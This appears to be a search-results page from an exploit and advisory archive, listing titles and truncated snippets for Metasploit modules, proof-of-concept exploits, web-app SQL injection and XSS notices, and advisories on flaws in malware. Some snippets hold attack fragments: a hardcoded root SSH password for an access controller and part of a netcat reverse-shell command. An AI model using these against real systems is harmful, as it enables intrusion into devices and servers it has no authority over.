50748 matches found
Backdoor.Win32.Destrukor.20 MVID-2022-0626 Authentication Bypass / Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Destrukor.20 Vulnerability: Authentication Bypass Description: The malware...
VoIPmonitor WEB GUI 24.55 Cross Site Scripting
VoIPmonitor WEB GUI vulnerable to Cross-Site Scripting via SIP messages - Fixed versions: VoIPmonitor WEB GUI 24.56 - Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-02-voipmonitor-gui-xss - VoIPmonitor Security Advisory: none, changelog references fixes ...
Nortek Linear eMerge E3 Access Controller 1.00-06 SSH/FTP Remote Root
!/usr/bin/env python Nortek Linear eMerge E3 Access Controller SSH/FTP Remote Root Affected version: \n' sys.exit ip = sys.argv1 rshell = ssh'root', ip, password='davestyle', port=22 rshell.interactive...
DFG JIT Use-After-Free
DFG's doesGC is incorrect about the HasIndexedProperty operation's behavior on StringObjects. This can lead to a use-after-free condition. See also https://bugs.chromium.org/p/project-zero/issues/detail?id=1699 for a similar issue. The DFG JIT compiler attempts to determine whether a DFG IR...
ColdFusion Server Check
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ColdFusion Server Check', 'Description' = %q This module attempts to exploit the directory traversal in the 'locale' attribute. According to the...
Kortex 1.0 SQL Injection
Titles: KORTEX-1.0 SQLi Author: nu11secur1ty Date: 05/09/2024 Vendor: https://mayurik.com/ Software: https://www.mayurik.com/source-code/P5339/best-free-law-office-management-software Reference: https://portswigger.net/web-security/sql-injection Description: The username parameter appears to be...
Ericom Access Server 9.2.0 Server-Side Request Forgery
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt + twitter.com/hyp3rlinx + ISR: ApparitionSec Vendor www.ericom.com Product Ericom Access Server x64...
WeBid 1.0.2 Cross Site Request Forgery
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...
Candy Redis 2.1.2 Admin Page Disclosure
==================================================================================================================================== | Title : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox 125.0.1 64...
PRTG Authenticated Remote Code Execution
class MetasploitModule 'PRTG CVE-2023-32781 Authenticated RCE', 'Description' = %q Authenticated RCE in Paessler PRTG , 'License' = MSFLICENSE, 'Author' = 'Kevin Joensen ', 'References' = 'URL', 'https://baldur.dk/blog/prtg-rce.html', 'CVE', '2023-32781' , 'DisclosureDate' = '2023-08-09',...
Backdoor.Win32.Delf.arjo Unquoted Service Path
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/05177f77f075293ff7d58a7f2915c64f.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Delf.arjo Vulnerability: Insecure Service Path Description: The malware creates a...
Trojan.Win32.Hotkeychick.d Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/aff493ed1f98ed05c360b462192d2853.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32.Hotkeychick.d Vulnerability: Insecure Permissions Description: creates an insecure dir...
UBICOD Medivision Digital Signage 1.5.1 Privilege Escalation
UBICOD Medivision Digital Signage 1.5.1 Privilege Escalation Through Authorization Bypass Vendor: UBICOD Co., Ltd. | MEDIVISION INC. Product web page: http://www.medivision.co.kr Affected version: Firmware 1.5.1 2013.01.3 Summary: Medivision is a service that provides everything from DID operatio...
Code Blocks 20.03 Denial Of Service
Exploit Title: Code Blocks 20.03 - Denial Of Service PoC Vendor Homepage: http://www.codeblocks.org/ Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download Exploit Author: Paras Bhatia Discovery Date: 2020-06-23...
Chat Bot 1.0 SQL Injection
Titles: Chat Bot - PHP by: oretnom23 v1.0 Multiple SQLi Author: nu11secur1ty Date: 05/22/2024 Vendor: https://github.com/oretnom23 Software: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html Reference: https://portswigger.net/web-security/sql-injection...
Atlassian Confluence Improper Authorization / Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE CVE-2023-22518', 'Description' = %q This Improper...
PTC - Codebeamer Cross Site Scripting
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Reflected Cross-Site Scripting XSS product: PTC - Codebeamer ALM Solution vulnerable version: =22.10-SP8, =22.04-SP6, =21.09-SP14 CVE number: CVE-2023-4296 impact: high...
Oracle WebLogic Server 14.1.1.0 Remote Code Execution
Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE Authenticated Date: 2021-01-21 Exploit Author: Photubias Vendor Advisory: 1 https://www.oracle.com/security-alerts/cpujan2021.html Vendor Homepage: https://www.oracle.com Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 fixed ...
Customer Support System 1.0 Cross Site Scripting
Exploit Title: Customer Support System 1.0 - Stored XSS in The Admin Panel Date: 2020-11-11 Exploit Author: Ahmed Abbas Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html Software Link:...
Netragard Security Advisory 2009-12-19
Advisory Summary ----------------------------------------------------------------------- Advisory Author : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20091219 Product Name : Mac OS X Java Runtime Product Version : Java for Mac OS X 10.6 Update 1 Vendor Name :...
Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification
KL-001-2023-003: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit Advisory ID: KL-001-2023-003 Publication Date: 2023.08.17 Publication URL:...
SLIMS 9.5.2 Cross Site Scripting
Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit Development: nu11secur1ty Date: 01.19.2023 Vendor: https://slims.web.id/web/ Software: https://github.com/slims/slims9bulian/releases/tag/v9.5.2 Reference:...
IOTransfer 4.0 Remote Code Execution
Exploit Title: IOTransfer V4 – Remote Code Execution RCE Date: 06/22/2022 Exploit Author: Tomer Peled Vendor Homepage: https://www.iobit.com Software Link: https://iotransfer.itopvpn.com/ Version: V4 and onward Tested on: Windows 10 CVE : 2022-24562 References:...
Aimeos Laravel Ecommerce Platform 2021.10 LTS SQL Injection
Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection Date: 20/11/2021 Exploit Author: Ilker Burak ADIYAMAN Vendor Homepage: https://aimeos.org Software Link: https://aimeos.org/laravel-ecommerce-package Version: Aimeos 2021.10 LTS Tested on: MacOSX Description: The...
FreeSWITCH 1.10.6 SIP Digest Leak
FreeSWITCH vulnerable to SIP digest leak for configured gateways - Fixed versions: v1.10.7 - Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-05-freeswitch-vulnerable-to-SIP-digest-leak - Vendor Security Advisory:...
NIMax 5.3.1f0 Denial Of Service
Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service PoC Date: 24/06/2021 Exploit Author: LinxzSec Vulnerability: Local Denial of Service DoS Vendor Homepage: https://www.ni.com/en-gb.html Software Link: License Required -...
Trojan.Win32.Hosts2.yqf Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/274a6e846c5a4a2b3281198556e5568b.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32.Hosts2.yqf Vulnerability: Insecure Permissions Description: Hosts2.yqf creates an...
SEOPanel 4.6.0 Cross Site Scripting
Hello, We are informing you about Cross-Site Scripting Vulnerabilities in SEOPanel 4.6.0. Information -------------------- Advisory by Netsparker Name: Cross-Site Scripting Vulnerabilities in SEOPanel Affected Software: SEOPanel Affected Versions: 4.6.0 Vendor Homepage: https://www.seopanel.org/...
Webmin 1.962 Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Webmin 1.962 - Package Update Escape Bypass RCE Metasploit', 'Description' = %q This module exploits an arbitrary command execution vulnerability...
Gym Management System 1.0 Cross Site Scripting
Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting Date: 21/10/2020 Exploit Author: Jyotsna Adhana Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html Software Link:...
OpenCart 3.0.3.2 Cross Site Scripting
Exploit Title: OpenCart 3.0.3.2 - Stored Cross Site Scripting Authenticated Date: 2020-06-01 Exploit Author: Kailash Bohara Vendor Homepage: https://www.opencart.com Software Link: https://www.opencart.com/index.php?route=cms/download Version: OpenCart UsersUsers and click on Action button on top...
Atlassian Confluence Widget Connector Macro Velocity Template Injection
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Atlassian Confluence Widget Connector Macro Velocity Template Injection", 'Description' = %q Widget Connector Macro is part of Atlassian Confluen...
Drupal ArabDevelopmentPortal Egypt 1.0 SQL Injection
Exploit Title : Drupal ArabDevelopmentPortal Egypt 1.0 SQL Injection Author Discovered By : KingSkrupellos Date : 30/12/2018 Vendor Homepages : arabportal.net / arabdevelopmentportal.com Tested On : Windows Exploit Risk : Medium Version Information : Apache 2.4.18 - PHP 7.0.30 - Ubuntu OS - 1.0 C...
Google Rejection Page Text Injection
Google's unusual traffic activity page appears to allow for text injection but cross site scripting is mitigated. The page https://www.google.com/sorry/index is familiar to Tor and VPN users. It is the one that says "Our systems have detected unusual traffic from your computer network. Please try...
Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Microsoft SQL Server SUSERSNAME SQL Logins Enumeration', 'Description' = %q This module can be used to obtain a list of all logins from a SQL...
AVideo WWBNIndex Plugin Unauthenticated Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AVideo WWBNIndex Plugin Unauthenticated RCE', 'Description' = %q This module exploits an unauthenticated remote code execution RCE vulnerability ...
Complaint Management System 2.0 SQL Injection
Exploit Title: Complaint-Management-System Multiple SQL Injection Vulnerabilities Date: 02/09/2-24 Exploit Author: Diyar Saadi Vendor Homepage: https://phpgurukul.com/complaint-management-sytem/ Software Link: https://phpgurukul.com/?sdmprocessdownload=1&downloadid=7259 Version: V 2.0 Tested on:...
Sudoedit Extra Arguments Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Sudoedit Extra Arguments Priv Esc', 'Description' = %q This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package. The...
Boa Web Server 0.94.13 / 0.94.14 Authentication Bypass
Exploit Title: Boa Web Server 0.94.13-0.94.14 Authentication Bypass Date: 19-11-2022 Exploit Author: George Tsimpidas Vendor: https://github.com/gpg/boa CVE: N/A Tested on: Debian 5.18.5 Description : Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the correct security constraint ...
OpenCart 3.x So Filter Shop By SQL Injection
Exploit Title: OpenCart v3.x So Filter Shop By - Blind SQL Injection Date: 28/06/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.opencart.com/ Software Link: https://codecanyon.net/item/so-filter-shop-by-responsive-opencart-module/13945633 Version: V3.X Tested on: XAMPP, Linux...
Webmin 1.973 Cross Site Request Forgery
Exploit Title: Webmin 1.973 - Cross-Site Request Forgery CSRF Date: 24/04/2021 Exploit Author: Mesh3l911 & Z0ldyck Vendor Homepage: https://www.webmin.com Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 Version: Webmin 1.973 Tested on: All versions POC By \0331;m \0331;37mMesh3l\0331;m...
Backdoor.Win32.Kwak.12 Authentication Bypass
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/c25393545e5ead3a35996ef9a887bd34B.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Kwak.12 Vulnerability: Authentication Bypass Description: The backdoor runs an FTP...
Backdoor.Win32.RemoteManipulator.brr Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/717f316391b6a7b97fa160b0a627a413.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.RemoteManipulator.brr Vulnerability: Insecure Permissions EoP Description: This malwa...
Trend Micro Web Security Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Trend Micro Web Security Virtual Appliance Remote Code Execution', 'Description' = %q This module exploits multiple vulnerabilities together in...
Microsoft Windows Silent Process Exit Persistence
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/post/file' require 'msf/core/exploit/exe' class MetasploitModule 'Windows Silent Process Exit Persistence', 'Description' = %q Windows allows you to se...
Honeywell PM43 Remote Code Execution
Exploit Title: Honeywell PM43 ' if htmlstartindex != -1: return responsetext:htmlstartindex else: return responsetext except requests.exceptions.RequestException as e: return f"Error: e" def main: parser = argparse.ArgumentParserdescription='Command Injection PoC for Honeywell PM43 Printers'...
Online Student Clearance System 1.0 Shell Upload
!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...
Microsoft Office 365 18.2305.1222.0 Remote Code Execution
Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege Vulnerability + RCE. Author: nu11secur1ty Date: 07.18.2023 Vendor: https://www.microsoft.com/ Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office Reference:...
Backdoor.Win32.Pahador.aj Authentication Bypass / Code Execution
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/f393943eb6a80c8321f31c4543ba0bcf.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Pahador.aj Vulnerability: Authentication Bypass RCE Description: The malware listens ...
Garbage Collection Management System 1.0 Shell Upload / SQL Injection
Exploit Title: Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload Date: 05-07-2021 Exploit Author: Luca Bernardi - bernardiluca.job at protonmail.com | luca.bernardi at dedagroup.it Vendor Homepage: https://www.sourcecodester.com/ Software Link:...